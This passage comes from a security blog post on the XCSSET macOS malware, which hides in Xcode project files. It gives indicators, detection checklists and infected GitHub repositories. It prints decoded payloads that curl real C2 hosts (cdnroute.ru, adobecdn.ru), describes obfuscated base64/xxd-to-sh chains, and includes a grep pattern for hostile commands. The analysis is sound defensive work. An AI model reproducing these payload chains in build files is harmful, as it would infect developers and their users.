&#8220;Dock method&#8221;: a fake Launchpad app is placed in\n                            Caches and registered with the Dock via\n                            <code>dockutil<\/code>, guaranteeing execution on\n                            every login without requiring root privileges\n                        <\/td>\n                        <td class=\"xa-source\">\n                            <span>Microsoft, Mar 2025<\/span>\n                        <\/td>\n                    <\/tr>\n                    <tr>\n                        <td class=\"xa-observed\">\n                            <span class=\"xa-row-num\">7<\/span>20+ distinct Xcode\n                            projects modified within a single minute\n                        <\/td>\n                        <td class=\"xa-described\">\n                            Mass injection of all discoverable\n                            <code>.xcodeproj<\/code> files in the home directory\n                            is triggered by the auto-propagation module \u2014 the\n                            mechanism that turns every infected machine into a\n                            supply-chain node\n                        <\/td>\n                        <td class=\"xa-source\">\n                            <span>Microsoft, Mar 2025<\/span>\n                        <\/td>\n                    <\/tr>\n                <\/tbody>\n            <\/table>\n        <\/div>\n\n        <div class=\"xa-footnote\">\n            <strong>On attribution confidence:<\/strong> Each of the seven\n            indicators above is independently documented across multiple vendor\n            reports spanning 2021\u20132025. Their simultaneous presence in a single\n            sample \u2014 combined with consistent architectural patterns (compiled\n            AppleScript, modular runtime config, <code>.ru<\/code> C2\n            infrastructure, Dock-based persistence) \u2014 places attribution\n            confidence well above the threshold for formal identification.\n        <\/div>\n    <\/div>\n<\/div>\n\n\n\n<p>What the table above establishes is not just identity \u2013 it is an operational state. The sample wasn&#8217;t dormant or partially deployed; every layer of XCSSET&#8217;s known architecture was active simultaneously: obfuscation, persistence, browser targeting, the C2 channel, and the propagation mechanism.&nbsp;<\/p>\n\n\n\n<p>That last point matters most. The 20+ modified Xcode projects mean this machine had already become a distribution node, silently embedding XCSSET into codebases that would eventually reach other developers. By the time behavioral detection flagged the sample, the infection had moved beyond the single host.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"for-developers-what-to-check-right-now\">For Developers: What to Check Right Now<\/h2>\n\n\n\n<p>XCSSET requires no special privileges and leaves no obvious traces in the places most developers think to look. The checklist below is ordered by effort: the first three items take under five minutes and, together, cover the majority of known infection vectors.<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Never open an unfamiliar Xcode project in Xcode before manually inspecting its build phases. Opening project.pbxproj as plain text is safe. Clicking Build is not.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li>Periodically scan your home directory for XCSSET signatures. The command below is read-only; it does not touch anything. No output means you&#8217;re clean; any output means read it carefully.<\/li>\n<\/ul>\n\n\n\n<div class=\"htmlAdexBlock\">\n    <style>\n        .cb-block {\n            background: #fafbff;\n            border: 1px solid #e8eaf5;\n            border-radius: 12px;\n            overflow: hidden;\n            max-width: 860px;\n        }\n        .cb-topbar {\n            display: flex;\n            align-items: center;\n            gap: 6px;\n            padding: 10px 16px;\n            background: #f2f4fc;\n            border-bottom: 1px solid #e8eaf5;\n        }\n        .cb-dot {\n            width: 10px;\n            height: 10px;\n            border-radius: 50%;\n        }\n        .cb-dot-r {\n            background: #ff5f57;\n        }\n        .cb-dot-y {\n            background: #febc2e;\n        }\n        .cb-dot-g {\n            background: #28c840;\n        }\n        .cb-body {\n            padding: 20px 24px;\n            overflow-x: auto;\n        }\n        .cb-body pre {\n            font-family: \"JetBrains Mono\", monospace;\n            font-size: 13px;\n            line-height: 1.8;\n            white-space: pre;\n            color: #555;\n            margin: 0;\n        }\n        .cb-cmd {\n            color: #0f0063;\n            font-weight: 500;\n        }\n        .cb-path {\n            color: #00a696;\n        }\n        .cb-arg {\n            color: #ff645a;\n        }\n        .cb-op {\n            color: #9b59b6;\n            font-weight: 500;\n        }\n        .cb-cmt {\n            color: #aaa;\n            font-style: italic;\n        }\n    <\/style>\n\n    <div class=\"cb-block\">\n        <div class=\"cb-topbar\">\n            <div class=\"cb-dot cb-dot-r\"><\/div>\n            <div class=\"cb-dot cb-dot-y\"><\/div>\n            <div class=\"cb-dot cb-dot-g\"><\/div>\n        <\/div>\n        <div class=\"cb-body\">\n            <pre><span class=\"cb-cmd\">find<\/span> ~ \\( \\\n  <span class=\"cb-arg\">-path<\/span> <span class=\"cb-path\">\"*\/*.xcodeproj\/project.pbxproj\"<\/span> \\\n  <span class=\"cb-op\">-o<\/span> <span class=\"cb-arg\">-path<\/span> <span class=\"cb-path\">\"*\/.git\/hooks\/*\"<\/span> \\\n  <span class=\"cb-op\">-o<\/span> <span class=\"cb-arg\">-path<\/span> <span class=\"cb-path\">\"*\/.husky\/*\"<\/span> \\\n  <span class=\"cb-op\">-o<\/span> <span class=\"cb-arg\">-path<\/span> <span class=\"cb-path\">\"*\/Library\/LaunchAgents\/*.plist\"<\/span> \\\n\\) <span class=\"cb-arg\">-type f -print0<\/span> <span class=\"cb-cmt\">2>\/dev\/null<\/span> | \\\n<span class=\"cb-cmd\">xargs<\/span> <span class=\"cb-arg\">-0<\/span> <span class=\"cb-cmd\">rg<\/span> <span class=\"cb-arg\">-n --no-heading -S<\/span> \\\n  <span class=\"cb-path\">\"(curl[^\\n]*\\|\\s*(sh|bash)|wget\\b|osascript\\b|osacompile\\b|base64\\b.*(--decode|-d)|\\\npython\\s+-c\\b|node\\s+-e\\b|\/tmp\/|plutil\\b[^\\n]*LSUIElement|launchctl\\b)\"<\/span><\/pre>\n        <\/div>\n    <\/div>\n<\/div>\n\n\n\n\n<ul start=\"3\" class=\"wp-block-list\">\n<li>Check your global git hooks: <strong>git config &#8211;global &#8211;get core.hooksPath<\/strong>. If it returns anything, inspect the directory it points to.<br><\/li>\n\n\n\n<li>Run behavioral monitoring. On macOS, the free options worth knowing are an outbound firewall that prompts on each new connection and a persistence monitor that alerts on any attempt to register a launch item. <a href=\"https:\/\/objective-see.org\/\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Objective-See<\/a> and similar research communities publish well-maintained tools of this kind regularly.<br><\/li>\n\n\n\n<li>Do not disable SIP on a development machine for convenience. System Integrity Protection is the primary barrier between malware of this class and your system files. The convenience is not worth it.<br><\/li>\n\n\n\n<li>For teams: keep all project.pbxproj files in git and commit them after every intentional change. XCSSET infects every project it finds in under a minute \u2014 any modified file will immediately show up in git status. To check all pbxproj files in a repository at once: <strong>git diff &#8211;name-only &#8212; &#8216;**\/*.pbxproj&#8217;.<\/strong><br><\/li>\n<\/ul>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"for-organizations-detection-containment-and-policy\">For Organizations: Detection, Containment, and Policy<\/h2>\n\n\n<div class=\"block__bord\"><div class=\"block__bord_desc\"><p>Individual hygiene is not enough when developer machines are shared infrastructure. At the organizational level, XCSSET prioritizes supply-chain risk over endpoint risk: a single compromised workstation can quietly embed malicious build steps into repositories that are then cloned, built, and shipped downstream.<\/p>\n<\/div><\/div>\n<style>\n.block__bord { margin: 32px 0; padding: 1.25em 2.375em;\tborder-radius: 24px; background: rgba(0, 220, 200, 0.20); }\n.block__bord_desc {font-size: 16px !important;font-weight: 400 !important;color: #606060 !important;}\n<\/style>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Do not rely solely on antivirus.<\/strong> XCSSET has evaded signature-based detection for years. The infection lives inside plain-text build files; execution happens through standard developer tooling that no scanner will flag on sight.<br><\/li>\n\n\n\n<li><strong>Deploy EDR with a behavioral model on developer machines.<\/strong> Key triggers to configure: osascript launched from \/tmp, curl connecting to low-reputation or newly registered domains, and modifications to launch agents not initiated through MDM.<br><\/li>\n\n\n\n<li><strong>Audit third-party SDKs and dependencies.<\/strong> Know which external Xcode projects your CI pipeline builds, who added them, and whether their build phases contain any code you did not write and cannot trace.<br><\/li>\n\n\n\n<li><strong>Lock down developer machines via MDM.<\/strong> Block application installation from arbitrary DMGs, enforce signing requirements on launch agent plists, and monitor changes to core.hooksPath across the fleet.<br><\/li>\n\n\n\n<li><strong>Rotate API tokens regularly<\/strong>: cloud providers and git services. If any developer machine was compromised, every token that existed on it should be treated as leaked.<br><\/li>\n\n\n\n<li><strong>Incident response order matters.<\/strong> On confirmed infection, do not start by cleaning individual projects. First, remove the persistence points \u2013 the fake Launchpad app, any rogue launch agents, .zshrc injections, and git hooks \u2013 then reboot, and only then restore affected projects from a known-clean git state. Reversing that order leaves the malware in place while you work.<br><\/li>\n<\/ul>\n\n\n\n<p>The common thread across both sections is timing. XCSSET&#8217;s effectiveness depends almost entirely on going unnoticed long enough to propagate: through your projects, through your team, and eventually through your users.&nbsp;<\/p>\n\n\n\n<p>The behaviors described above are not difficult to detect once you know what to look for; the threat persists because most developers never think to look.&nbsp;<\/p>\n\n\n<div class=\"block__preview\">\n        <a href=\"https:\/\/adex.com\/blog\/new-threat-malicious-redirects-detected-in-ad-campaigns\/\" class=\"block__preview_img\"><img src=\"https:\/\/adex.com\/blog\/wp-content\/uploads\/2023\/06\/Adex-malicious-redirects-case-study.png\" srcset=\"https:\/\/adex.com\/blog\/wp-content\/uploads\/2023\/06\/Adex-malicious-redirects-case-study.png\" sizes=\"100vw\" alt=\"Adex - malicious redirects case study\" decoding=\"async\" class=\"lazy\"><\/a>\n    <div class=\"block__preview_box\">\n        <a href=\"https:\/\/adex.com\/blog\/category\/current_risks\/\" class=\"block__preview_box-cat\">Current risks<\/a>        <h3 class=\"block__preview_box-title\" id=\"new-threat-malicious-redirects-detected-in-ad-campaigns\"><a href=\"https:\/\/adex.com\/blog\/new-threat-malicious-redirects-detected-in-ad-campaigns\/\">[New Threat] Malicious Redirects Detected in Ad Campaigns<\/a><\/h3>\n    <\/div>\n<\/div>\n<style>\n.block__preview {display: flex;align-items: center;justify-content: center; margin: 32px 0;}\n.block__preview a {text-decoration: none;}\n.block__preview_img {min-width: 360px;max-width: 360px;min-height: 188px;width: 100%;height: 100%;}\n.block__preview_img img {width: 100%;height: 100%;}\n.block__preview_box {margin-left: 40px;max-width: 360px;}\n.block__preview_box-cat {color: #00B8A7 !important;font-weight: 600;font-size: 12px;line-height: 16px;text-transform: uppercase; display: block; margin-bottom: 4px;}\n.block__preview_box-cat:hover {color: #FE645A !important; text-decoration: none !important;}\n.block__preview_box-title {font-size: 20px;font-weight: 700;line-height: 24px;color: #0B172D;}\n.block__preview_box-title a {color: #0B172D !important;}\n.block__preview_box-title a:hover {color: #FE645A !important;}\n@media screen and (max-width: 768px) {.block__preview {flex-direction: column;}.block__preview_box {max-width: 100%; margin-top: 32px;margin-left: 0px;}.block__preview_img {max-width: 100%;min-width: 100%;min-height: 100%;}}<\/style>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"infected-repositories-on-github-xcsset-in-the-wild\">Infected Repositories on GitHub: XCSSET in the Wild<\/h2>\n\n\n\n<p>The most straightforward way to find XCSSET samples is not a malware repository or a threat intelligence feed \u2013 it is GitHub&#8217;s own code search.&nbsp;<\/p>\n\n\n\n<p>At the time of writing, authenticated dork queries return 24 repositories containing live payload chains, several of them committed within days of this investigation. Three examples are examined in detail below with fully decoded payloads; the complete list follows.<\/p>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"example-1-princemittal1-demoforauthflow\"><strong>Example 1: <\/strong><a href=\"https:\/\/github.com\/PrinceMittal1\/DemoForAuthFlow\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>PrinceMittal1\/DemoForAuthFlow<\/strong><\/a><\/h3>\n\n\n\n<p>A React Native application with an iOS target. In <a href=\"https:\/\/github.com\/PrinceMittal1\/DemoForAuthFlow\/blob\/d5c7dec978eff6a71b0df4ddffc7a3c92c8eb1e5\/ios\/DemoForAuthFlow.xcodeproj\/project.pbxproj#L337\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">ios\/DemoForAuthFlow.xcodeproj\/project.pbxproj<\/a>, lines 337\u2013381, there are six distinct payload blocks.&nbsp;<\/p>\n\n\n\n<p>What makes this sample particularly notable is that both obfuscation variants are present simultaneously \u2014 base64 -D | base64 -D | base64 -D | sh and xxd -p -r | xxd -p -r | xxd -p -r | sh \u2013 with iteration depth reaching five rounds, specifically to defeat static analysis on the first pass.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"example-2-zzzznick-dummy-ios\"><strong>Example 2: <\/strong><a href=\"https:\/\/github.com\/zzzznick\/dummy-ios\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>zzzznick\/dummy-ios<\/strong><\/a><\/h3>\n\n\n\n<p>By its name, this appears to be a throwaway test repository, but it contains a live infection.&nbsp;<\/p>\n\n\n\n<p>The file <a href=\"https:\/\/github.com\/zzzznick\/dummy-ios\/blob\/6d2d9b2a4acb513ce5ce1d04c9462b28ce38b834\/demo\/ABiteOfMouthFeastBook_5.28\/ABiteOfMouthFeastBook.xcodeproj\/project.pbxproj#L452\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">demo\/ABiteOfMouthFeastBook_5.28\/ABiteOfMouthFeastBook.xcodeproj\/project.pbxproj<\/a>, lines 452\u2013614, holds a dozen payload blocks chained as base64 -D \u00d7 4 | sh.&nbsp;<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h3 class=\"wp-block-heading\" id=\"example-3-dvillegastech-reaxbd\"><strong>Example 3: <\/strong><a href=\"https:\/\/github.com\/dvillegastech\/ReaxBD\" target=\"_blank\" rel=\"noreferrer noopener nofollow\"><strong>dvillegastech\/ReaxBD<\/strong><\/a><\/h3>\n\n\n\n<p><em>(<a href=\"https:\/\/github.com\/dvillegastech\/ReaxBD\/issues\/6\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">Issue #6<\/a>, write-up by Mayank Joshi, September 2025.)<\/em> Two infected files:<\/p>\n\n\n\n<div>\n<style>\n  .adx-wrap {\n    font-family: 'Inter', sans-serif;\n    background: #ffffff;\n    border-radius: 16px;\n    border: 1px solid #e8eaf5;\n    max-width: 900px;\n    margin: 0 auto;\n    overflow: hidden;\n  }\n\n  .adx-topbar {\n    display: flex;\n    align-items: center;\n    justify-content: space-between;\n    padding: 12px 24px;\n    background: #f2f4fc;\n    border-bottom: 1px solid #e8eaf5;\n  }\n\n  .adx-topbar-left {\n    display: flex;\n    align-items: center;\n    gap: 8px;\n  }\n\n  .adx-dot { width: 10px; height: 10px; border-radius: 50%; }\n  .adx-dot-r { background: #FF5F57; }\n  .adx-dot-y { background: #FEBC2E; }\n  .adx-dot-g { background: #28C840; }\n\n  .adx-topbar-label {\n    font-size: 12px;\n    font-weight: 600;\n    color: #0F0063;\n    letter-spacing: 0.04em;\n    margin-left: 4px;\n    opacity: 0.5;\n  }\n\n  .adx-badge {\n    font-size: 11px;\n    font-weight: 600;\n    background: #fff0f0;\n    color: #e0433a;\n    border: 1px solid #f5c5c2;\n    border-radius: 6px;\n    padding: 2px 10px;\n  }\n\n  .adx-overflow {\n    overflow-x: auto;\n  }\n\n  .adx-table {\n    width: 100%;\n    border-collapse: collapse;\n    min-width: 680px;\n  }\n\n  .adx-table thead th {\n    background: #f2f4fc;\n    color: #0F0063;\n    font-size: 10px;\n    font-weight: 600;\n    letter-spacing: 0.12em;\n    text-transform: uppercase;\n    padding: 10px 24px;\n    text-align: left;\n    border-bottom: 1px solid #e8eaf5;\n    opacity: 0.45;\n  }\n\n  .adx-table tbody tr {\n    border-bottom: 1px solid #f0f2fa;\n    transition: background 0.15s;\n  }\n\n  .adx-table tbody tr:last-child {\n    border-bottom: none;\n  }\n\n  .adx-table tbody tr:hover {\n    background: #f7f8fd;\n  }\n\n  .adx-table td {\n    padding: 16px 24px;\n    vertical-align: middle;\n  }\n\n  \/* File *\/\n  .adx-file-dir {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 11px;\n    color: #00A696;\n    line-height: 1.7;\n  }\n\n  .adx-file-name {\n    color: #0F0063;\n    font-weight: 500;\n  }\n\n  .adx-file-line {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 10px;\n    color: #00A696;\n    margin-top: 4px;\n    opacity: 0.7;\n  }\n\n  .adx-file-line span {\n    color: #A05DD2;\n    font-weight: 500;\n    opacity: 1;\n  }\n\n  \/* Chain *\/\n  .adx-chain {\n    display: flex;\n    align-items: center;\n    flex-wrap: wrap;\n    gap: 5px;\n  }\n\n  .adx-pill {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 11px;\n    border-radius: 6px;\n    padding: 3px 10px;\n    white-space: nowrap;\n    display: inline-flex;\n    align-items: center;\n    gap: 5px;\n  }\n\n  .adx-pill-echo {\n    background: #f2f4fc;\n    border: 1px solid #e8eaf5;\n    color: #0F0063;\n  }\n\n  .adx-pill-b64 {\n    background: #f7f2fc;\n    border: 1px solid #e8d9f5;\n    color: #A05DD2;\n  }\n\n  .adx-pill-sh {\n    background: #fff3f2;\n    border: 1px solid #ffd5d2;\n    color: #c0392b;\n    font-weight: 500;\n  }\n\n  .adx-pipe {\n    color: #e8eaf5;\n    font-size: 15px;\n    font-family: 'JetBrains Mono', monospace;\n  }\n\n  .adx-rep {\n    font-size: 10px;\n    background: #fdf5e6;\n    border: 1px solid #f0d9a0;\n    color: #a06000;\n    border-radius: 4px;\n    padding: 1px 5px;\n    font-family: 'JetBrains Mono', monospace;\n    font-weight: 600;\n  }\n\n  \/* Payload *\/\n  .adx-payload {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 11.5px;\n    background: #fafbff;\n    border: 1px solid #e8eaf5;\n    border-radius: 8px;\n    padding: 8px 14px;\n    line-height: 1.8;\n    white-space: nowrap;\n  }\n\n  .adx-p-cmd  { color: #0F0063; font-weight: 500; }\n  .adx-p-flag { color: #0F006388; }\n  .adx-p-dom  { color: #FF645A; font-weight: 500; border-bottom: 1px dashed #FF645A66; }\n  .adx-p-path { color: #00A696; }\n<\/style>\n<div class=\"adx-wrap\">\n  <div class=\"adx-topbar\">\n    <div class=\"adx-topbar-left\">\n      <div class=\"adx-dot adx-dot-r\"><\/div>\n      <div class=\"adx-dot adx-dot-y\"><\/div>\n      <div class=\"adx-dot adx-dot-g\"><\/div>\n      <span class=\"adx-topbar-label\">Suspicious findings<\/span>\n    <\/div>\n    <div class=\"adx-badge\">2 hits<\/div>\n  <\/div>\n  <div class=\"adx-overflow\">\n    <table class=\"adx-table\">\n      <thead>\n        <tr>\n          <th>File<\/th>\n          <th>Chain<\/th>\n          <th>Decoded payload<\/th>\n        <\/tr>\n      <\/thead>\n      <tbody>\n        <tr>\n          <td>\n            <div class=\"adx-file-dir\">example\/ios\/Runner.xcodeproj\/<span class=\"adx-file-name\">project.pbxproj<\/span><\/div>\n            <div class=\"adx-file-line\">line <span>290<\/span><\/div>\n          <\/td>\n          <td>\n            <div class=\"adx-chain\">\n              <span class=\"adx-pill adx-pill-echo\">echo VjJ4a1QySXl\u2026<\/span>\n              <span class=\"adx-pipe\">|<\/span>\n              <span class=\"adx-pill adx-pill-b64\">base64 -D <span class=\"adx-rep\">\u00d7 4<\/span><\/span>\n              <span class=\"adx-pipe\">|<\/span>\n              <span class=\"adx-pill adx-pill-sh\">sh<\/span>\n            <\/div>\n          <\/td>\n          <td>\n            <div class=\"adx-payload\">\n              <span class=\"adx-p-cmd\">curl<\/span><span class=\"adx-p-flag\"> -fskL -d p=xcode <\/span>https:\/\/<span class=\"adx-p-dom\">cdnroute.ru<\/span><span class=\"adx-p-path\">\/a<\/span>\n            <\/div>\n          <\/td>\n        <\/tr>\n        <tr>\n          <td>\n            <div class=\"adx-file-dir\">example\/macos\/Runner.xcodeproj\/<span class=\"adx-file-name\">project.pbxproj<\/span><\/div>\n            <div class=\"adx-file-line\">line <span>317<\/span><\/div>\n          <\/td>\n          <td>\n            <div class=\"adx-chain\">\n              <span class=\"adx-pill adx-pill-echo\">echo V2xkT2IySjV\u2026<\/span>\n              <span class=\"adx-pipe\">|<\/span>\n              <span class=\"adx-pill adx-pill-b64\">base64 -D <span class=\"adx-rep\">\u00d7 3<\/span><\/span>\n              <span class=\"adx-pipe\">|<\/span>\n              <span class=\"adx-pill adx-pill-sh\">sh<\/span>\n            <\/div>\n          <\/td>\n          <td>\n            <div class=\"adx-payload\">\n              <span class=\"adx-p-cmd\">curl<\/span><span class=\"adx-p-flag\"> -fskL -d p=xcode <\/span>https:\/\/<span class=\"adx-p-dom\">adobecdn.ru<\/span><span class=\"adx-p-path\">\/a<\/span>\n            <\/div>\n          <\/td>\n        <\/tr>\n      <\/tbody>\n    <\/table>\n  <\/div>\n<\/div>\n\n\n\n<p><\/p>\n\n\n\n<p>The logic is the same across all three examples: a long base64 string is decoded several times in sequence, yielding a short command that fetches the actual malware from a C2 server via curl and executes it silently in the background (&gt;\/dev\/null 2&gt;&amp;1 &amp;).<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"selected-highlights\">Selected Highlights<\/h2>\n\n\n\n<p>Seven repositories stand out from the full list of 24.&nbsp;<\/p>\n\n\n\n<p>Each is notable for a specific reason: a C2 domain that links it to a known campaign, a commit timestamp within hours of this investigation, or context that makes the infection particularly hard to dismiss as someone else&#8217;s problem.<\/p>\n\n\n\n<div>\n<style>\n  .tbl-outer {\n    font-family: 'Inter', sans-serif;\n    background: #ffffff;\n    border-radius: 16px;\n    border: 1px solid #e8eaf5;\n    max-width: 900px;\n    margin: 0 auto;\n    overflow: hidden;\n  }\n\n  .tbl-header {\n    padding: 24px 28px 20px;\n    border-bottom: 1px solid #e8eaf5;\n    background: #fafbff;\n  }\n\n  .tbl-heading {\n    font-size: 18px;\n    font-weight: 700;\n    color: #0F0063;\n    line-height: 1.3;\n  }\n\n  .tbl-sub {\n    font-size: 13px;\n    color: #4a4f7a;\n    margin-top: 4px;\n    line-height: 1.5;\n  }\n\n  .tbl-scroll {\n    overflow-x: auto;\n  }\n\n  .tbl-outer table {\n    width: 100%;\n    border-collapse: collapse;\n    min-width: 640px;\n  }\n\n  .tbl-outer thead th {\n    background: #f2f4fc;\n    color: #8b90b8;\n    font-size: 10px;\n    font-weight: 700;\n    letter-spacing: 0.12em;\n    text-transform: uppercase;\n    padding: 10px 20px;\n    text-align: left;\n    border-bottom: 1px solid #e8eaf5;\n    white-space: nowrap;\n  }\n\n  .tbl-outer tbody tr {\n    border-bottom: 1px solid #f0f2fa;\n    transition: background 0.15s;\n  }\n\n  .tbl-outer tbody tr:last-child {\n    border-bottom: none;\n  }\n\n  .tbl-outer tbody tr:hover {\n    background: #f7f8fd;\n  }\n\n  .tbl-outer td {\n    padding: 14px 20px;\n    vertical-align: top;\n  }\n\n  .tbl-repo {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 11.5px;\n    font-weight: 500;\n    color: #0F0063;\n    white-space: nowrap;\n  }\n\n  .tbl-repo-owner {\n    color: #8b90b8;\n    font-weight: 400;\n  }\n\n  .tbl-proj-tag {\n    display: inline-block;\n    font-size: 10px;\n    font-weight: 600;\n    letter-spacing: 0.05em;\n    padding: 2px 9px;\n    border-radius: 20px;\n    white-space: nowrap;\n  }\n\n  .tbl-proj-swift   { background: #fff0ef; color: #FF645A; }\n  .tbl-proj-flutter { background: #ede9fe; color: #A05DD2; }\n  .tbl-proj-macos   { background: #e8f7f5; color: #007a6e; }\n  .tbl-proj-ios     { background: #f0f1fc; color: #0F0063; }\n\n  .tbl-date {\n    font-size: 12px;\n    color: #4a4f7a;\n    white-space: nowrap;\n  }\n\n  .tbl-why {\n    font-size: 12.5px;\n    color: #4a4f7a;\n    line-height: 1.6;\n    max-width: 340px;\n  }\n\n  .tbl-why .c2 {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 11px;\n    color: #FF645A;\n    font-weight: 500;\n    border-bottom: 1px dashed #FF645A66;\n  }\n\n  .tbl-why .hl {\n    color: #0F0063;\n    font-weight: 600;\n  }\n\n  .tbl-why .nt {\n    color: #A05DD2;\n    font-weight: 500;\n  }\n<\/style>\n<div class=\"tbl-outer\">\n  <div class=\"tbl-header\">\n    <div class=\"tbl-heading\">Affected GitHub Repositories<\/div>\n    <div class=\"tbl-sub\">7 public projects found carrying active XCSSET payloads as of April 2026.<\/div>\n  <\/div>\n  <div class=\"tbl-scroll\">\n    <table>\n      <thead>\n        <tr>\n          <th>Repository<\/th>\n          <th>Project type<\/th>\n          <th>Date<\/th>\n          <th>Why it matters<\/th>\n        <\/tr>\n      <\/thead>\n      <tbody>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">usamajaved357\/<\/span>Breezy<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">SwiftUI<\/span><\/td>\n          <td><span class=\"tbl-date\">Mar 2026<\/span><\/td>\n          <td><div class=\"tbl-why\">C2 <span class=\"c2\">riggletoy.ru<\/span> \u2014 same domain as our live sample<\/div><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">xiaoyouPrince\/<\/span>XYDevTool<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-macos\">macOS tools<\/span><\/td>\n          <td><span class=\"tbl-date\">Apr 2026<\/span><\/td>\n          <td><div class=\"tbl-why\">C2 <span class=\"c2\">netcdndev.in<\/span> \u2014 <span class=\"hl\">new domain<\/span>, absent from all public IoC lists<\/div><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">rjkalola\/<\/span>OTMS-2.0-Flutter<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter<\/span><\/td>\n          <td><span class=\"tbl-date\">Apr 2026<\/span><\/td>\n          <td><div class=\"tbl-why\">Committed <span class=\"nt\">one day before the inspection<\/span><\/div><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">NandaMocha\/<\/span>Reflect<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-swift\">Swift<\/span><\/td>\n          <td><span class=\"tbl-date\">Feb 2026<\/span><\/td>\n          <td><div class=\"tbl-why\"><span class=\"hl\">82 commits<\/span> on top of the infection \u2014 <span class=\"nt\">the author was unaware<\/span><\/div><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">prodev-mob\/<\/span>screen-time-ios<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-ios\">iOS<\/span><\/td>\n          <td><span class=\"tbl-date\">Mar 2026<\/span><\/td>\n          <td><div class=\"tbl-why\">A screen-protection app, <span class=\"hl\">itself infected<\/span><\/div><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">dvillegastech\/<\/span>ReaxBD<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter\/Dart<\/span><\/td>\n          <td><span class=\"tbl-date\">Oct 2025<\/span><\/td>\n          <td><div class=\"tbl-why\">20 stars; C2 <span class=\"c2\">cdnroute.ru<\/span>, <span class=\"c2\">adobecdn.ru<\/span> \u2014 analyzed above<\/div><\/td>\n        <\/tr>\n        <tr>\n          <td><span class=\"tbl-repo\"><span class=\"tbl-repo-owner\">MVP-Applications\/<\/span>qibla_flutter<\/span><\/td>\n          <td><span class=\"tbl-proj-tag tbl-proj-flutter\">Flutter pkg<\/span><\/td>\n          <td><span class=\"tbl-date\">Feb 2026<\/span><\/td>\n          <td><div class=\"tbl-why\">Infection in <span class=\"hl\">example\/ios<\/span> \u2014 cloned as a dependency<\/div><\/td>\n        <\/tr>\n      <\/tbody>\n    <\/table>\n  <\/div>\n<\/div>\n<\/div>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"running-the-search-independently\">Running the Search Independently<\/h2>\n\n\n\n<p>All queries below require an authenticated GitHub account. Run them as-is \u2013 no modification needed.<\/p>\n\n\n\n<div>\n<style>\n  .sq-outer {\n    font-family: sans-serif;\n    background: #ffffff;\n    border-radius: 16px;\n    border: 1px solid #e8eaf5;\n    max-width: 900px;\n    margin: 0 auto;\n    overflow: hidden;\n  }\n\n  .sq-block {\n    background: #fafbff;\n    overflow: hidden;\n  }\n\n  .sq-topbar {\n    display: flex;\n    align-items: center;\n    gap: 6px;\n    padding: 8px 14px;\n    background: #f2f4fc;\n    border-bottom: 1px solid #e8eaf5;\n  }\n\n  .sq-dot { width: 9px; height: 9px; border-radius: 50%; }\n  .sq-dot-r { background: #FF5F57; }\n  .sq-dot-y { background: #FEBC2E; }\n  .sq-dot-g { background: #28C840; }\n\n  .sq-code {\n    padding: 14px 20px;\n    overflow-x: auto;\n  }\n\n  .sq-code pre {\n    font-family: 'JetBrains Mono', monospace;\n    font-size: 12.5px;\n    line-height: 2;\n    white-space: pre;\n    margin: 0;\n  }\n\n  .sq-filter { color: #8b90b8; }\n  .sq-path   { color: #00A696; font-weight: 500; }\n  .sq-quote  { color: #c2c6e8; }\n  .sq-cmd    { color: #FF645A; font-weight: 500; }\n  .sq-pipe   { color: #A05DD2; font-weight: 500; }\n  .sq-flag   { color: #4a4f7a; }\n<\/style>\n<div class=\"sq-outer\">\n  <div class=\"sq-block\">\n    <div class=\"sq-topbar\">\n      <div class=\"sq-dot sq-dot-r\"><\/div>\n      <div class=\"sq-dot sq-dot-y\"><\/div>\n      <div class=\"sq-dot sq-dot-g\"><\/div>\n    <\/div>\n    <div class=\"sq-code\"><pre><span class=\"sq-filter\">path:<\/span><span class=\"sq-path\">project.pbxproj<\/span> <span class=\"sq-quote\">\"<\/span><span class=\"sq-cmd\">echo<\/span><span 